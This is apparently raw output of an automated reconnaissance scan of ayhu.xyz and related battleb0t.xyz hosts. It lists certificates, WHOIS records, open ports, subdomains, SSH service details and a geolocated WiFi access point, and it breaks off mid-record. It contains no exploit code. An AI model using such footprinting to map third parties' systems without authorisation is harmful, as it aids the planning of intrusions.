Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
F7:A7:5E:24:2E:1C:7A:7A:2A:90:36:DF:66:18:6B:A7:17:36:7E:3E
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/_NaLKSGSIEY
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/fXbrD094iyQ.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
| ayhu.xyz |
| 2023-05-12 03:24:30 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 7 | 0 | None | NameCheap, Inc. | Domain Name: NETCRAFT.COM
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-12-07T10:43:50Z
Creation Date: 1994-10-18T04:00:00Z
Registry Expiry Date: 2026-10-17T04:00:00Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: AUTHNS1.NETCRAFT.COM
Name Server: AUTHNS2.NETCRAFT.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Domain name: netcraft.com
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2020-09-21T12:40:37.88Z
Creation Date: 1994-10-18T04:00:00.00Z
Registrar Registration Expiration Date: 2026-10-17T04:00:00.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Name Server: authns1.netcraft.com
Name Server: authns2.netcraft.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:56:11.35Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Hangar6 (Net ID: 00:02:6F:E9:36:AC) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:32:15 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.8:80 | 188.114.97.0/24 |
| 2023-05-12 02:44:28 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | CN=*.ayhu.xyz |
| 2023-05-12 03:08:43 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 64.226.81.48 | 64.226.81.43 |
| 2023-05-12 02:45:42 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 2 | 0 | None | 34.0544, -118.244 | 185.199.108.153 |
| 2023-05-12 02:44:18 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:4d:72:d7:7c:dd:a7:02:dd:5a:67:f2:a2:3b:bd:d9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1
Validity
Not Before: Feb 21 00:00:00 2023 GMT
Not After : Mar 20 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:B7:6B:A2:EA:A8:AA:84:8C:79:EA:B4:DA:0F:98:B2:C5:95:76:B9:F4
X509v3 Subject Key Identifier:
8D:02:1C:75:5A:CD:C6:A6:41:78:69:28:C3:F7:AA:A7:98:3B:D5:BB
X509v3 Subject Alternative Name:
DNS:*.github.io, DNS:github.io, DNS:*.github.com, DNS:github.com, DNS:www.github.com, DNS:*.githubusercontent.com, DNS:githubusercontent.com
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
Full Name:
URI:http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt
X509v3 Basic Constraints:
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Feb 21 15:03:41.179 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:AA:7E:67:D2:3B:C3:31:79:E5:59:FD:
F2:73:AA:A0:41:A7:E5:6A:79:10:D4:39:40:55:1B:24:
D3:3A:7E:37:7B:02:21:00:94:F4:4B:6E:E6:98:65:25:
A6:A3:62:0C:00:CF:F8:9A:3C:0B:A9:18:1C:5F:BB:53:
A4:D8:EF:86:C7:5C:70:1A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 73:D9:9E:89:1B:4C:96:78:A0:20:7D:47:9D:E6:B2:C6:
1C:D0:51:5E:71:19:2A:8C:6B:80:10:7A:C1:77:72:B5
Timestamp : Feb 21 15:03:41.162 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 48:B0:E3:6B:DA:A6:47:34:0F:E5:6A:02:FA:9D:30:EB:
1C:52:01:CB:56:DD:2C:81:D9:BB:BF:AB:39:D8:84:73
Timestamp : Feb 21 15:03:41.130 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
| 185.199.110.153 |
| 2023-05-12 03:01:19 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.164): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:48 | Netblock Membership | No | Censys | 0 | 0 | 3 | 0 | None | 34.148.96.0/20 | 34.148.97.127 |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 104.21.6.166 |
| 2023-05-12 02:56:04 | Blacklisted IP on Same Subnet | Yes | DroneBL | 0 | 0 | 3 | 0 | None | dronebl.org - HTTP Proxy (87.248.157.123) | 87.248.157.0/24 |
| 2023-05-12 03:00:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.52): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:00:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-128@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T01:15:51.449Z", "ip": "207.154.228.169", "labels": ["remote-access"], "location_updated_at": "2023-04-26T16:44:53.689109Z", "autonomous_system_updated_at": "2023-04-26T16:44:53.689174Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:33.692371432Z"}, "www.gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T18:54:15.274018983Z"}, "www.blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.495668467Z"}, "sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:58.102845672Z"}, "mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-09T22:38:36.279855979Z"}, "sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:34.142966985Z"}, "www.magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-25T04:27:35.542554385Z"}, "the.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:05.045794814Z"}, "git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-18T22:02:08.010914546Z"}, "why.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.763792122Z"}, "blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:41.064561319Z"}, "pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.203437608Z"}, "www.staging.pointlane.com": {"record_type": "A", "resolved_at": 
"2023-03-27T22:00:31.907335501Z"}, "www.mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.687219106Z"}, "www.polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.199285708Z"}, "www.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:33.577672224Z"}, "dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.141552446Z"}, "gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T10:53:09.803238695Z"}, "magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:18.482468579Z"}, "abs.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:22.221262680Z"}, "shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:40.132954471Z"}, "apk.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.628764632Z"}, "www.sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.479130613Z"}, "store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.021634906Z"}, "www.mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-02T14:44:59.299521244Z"}, "blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:12.270323061Z"}, "www.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:51.220733315Z"}, "gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:25.974047797Z"}, "getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:43.775790789Z"}, "www.test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.458677133Z"}, "www.sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:35.410578926Z"}, "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:49.792043016Z"}, "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": 
"2023-03-26T21:45:11.528325040Z"}, "polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:11.409230997Z"}, "staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:15.055432105Z"}, "www.old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-18T22:01:33.780417520Z"}, "www.gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:09.056676609Z"}, "the.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:43.060825855Z"}, "mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.585095495Z"}, "old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:10.411213800Z"}, "www.shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.772740465Z"}, "posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.103803419Z"}, "www.git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:24.300688116Z"}, "app.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.045102600Z"}, "www.store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T16:00:25.103894275Z"}, "on.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.198972199Z"}, "www.blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:08.475610608Z"}, "www.dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-26T21:44:39.836624314Z"}, "crm.sirket.im": {"record_type": "A", "resolved_at": "2023-05-10T17:17:53.506957947Z"}, "javadfra.softether.net": {"record_type": "A", "resolved_at": "2023-05-09T20:04:58.925278232Z"}, "www.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.498526700Z"}, "tsxwdq.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-29T17:33:24.980088481Z"}, "wow.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-20T14:24:20.099465955Z"}, "test.pointlane.com": {"record_type": "A", "resolved_at": 
"2023-03-20T00:13:37.049342133Z"}, "what.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:49.646289405Z"}, "at.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-13T14:57:51.931938167Z"}, "polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.054213831Z"}, "in.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.386503067Z"}, "www.polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.836285670Z"}, "www.demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:02.797080934Z"}, "app.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.212849951Z"}}, "names": ["sitemap.posadisad.com", "the.pointlane.com", "shop.pointlane.com", "test.pointlane.com", "www.staging.pointlane.com", "www.blog.getsimnum.posadisad.com", "abs.posadisad.com", "getsimnum.posadisad.com", "in.pointlane.com", "posadisad.com", "magento.pointlane.com", "crm.sirket.im", "mail.pointlane.com", "www.mail.posadisad.com", "staging.pointlane.com", "sitemaps.posadisad.com", "pointlane.com", "www.sitemap.posadisad.com", "blog.getsimnum.posadisad.com", "www.demo.pointlane.com", "demo.pointlane.com", "what.pointlane.com", "www.store.pointlane.com", "www.old.pointlane.com", "www.mail.pointlane.com", "app.pointlane.com", "www.gitlab.pointlane.com", "app.posadisad.com", "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "blog.posadisad.com", "javadfra.softether.net", "at.pointlane.com", "mail.posadisad.com", "polygon.pointlane.com", "git.posadisad.com", "gitlab.posadisad.com", "old.pointlane.com", "wow.posadisad.com", "polygon.posadisad.com", "gitlab.pointlane.com", "apk.pointlane.com", "www.magento.pointlane.com", "www.polygon.pointlane.com", "dev.pointlane.com", "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "the.posadisad.com", "www.blog.posadisad.com", "store.pointlane.com", "www.dev.pointlane.com", "www.getsimnum.posadisad.com", "why.posadisad.com", 
"www.test.pointlane.com", "www.shop.pointlane.com", "on.pointlane.com", "www.polygon.posadisad.com", "tsxwdq.easypanel.host", "www.posadisad.com", "www.gitlab.posadisad.com", "www.git.posadisad.com", "www.sitemaps.posadisad.com", "www.pointlane.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.49", "extended_service_name": "SSH", "observed_at": "2023-05-11T01:15:50.786715445Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "547dbd625a27506b11586280f4a822637523e4a0ab006b506caadd882fb07151", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "8oJhdPmy3h9TMJvWg4Uf9bFwsyMd8Wzn2vYjEAGHvAA=", "x": "+yukgG2Uj68iboVSBhBnXM3KU5F0vU7GhjX/PobpTIQ=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", 
"ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sh |
| 2023-05-12 02:45:04 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | United States | googleusercontent.com |
| 2023-05-12 02:44:27 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Cloudflare | nwapi.battleb0t.xyz |
| 2023-05-12 03:08:52 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.135 | 34.148.97.127 |
| 2023-05-12 02:50:19 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:aa:0b:fb:f5:72:57:f7:90:57:35:0a:22:0c:3a:41:5a:d1
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 14 17:48:35 2023 GMT
Not After : Apr 14 17:48:34 2023 GMT
Subject: CN=funny-face-pictures.nom-nom.link
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:bd:1c:66:69:41:70:5a:26:6b:f9:5d:75:98:b4:
8f:50:49:99:4a:13:c7:34:5d:07:06:03:17:45:62:
35:db:24:d3:13:a5:28:c9:bc:9e:26:03:0e:28:c7:
d0:92:34:41:85:ff:c9:ec:be:04:85:ca:56:f3:8d:
46:7d:03:91:0a
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D0:E0:AC:A3:54:40:02:9F:45:F6:D9:F1:FF:DC:7A:58:77:FF:5A:B0
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny-face-pictures.nom-nom.link, DNS:funny.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 14 18:48:35.447 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Jan 14 18:48:35.442 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 4 | 0 | None | 15169 | 34.74.160.0/20 |
| 2023-05-12 02:50:29 | Physical Address | No | GLEIF | 0 | 0 | 3 | 0 | None | C/O CORPORATION SERVICE COMPANY, 251 LITTLE FALLS DRIVE, WILMINGTON, US-DE, US, 19808 | Go Daddy, LLC |
| 2023-05-12 02:44:20 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.110.153 |
| 2023-05-12 02:44:31 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | pics.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', 
u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': 
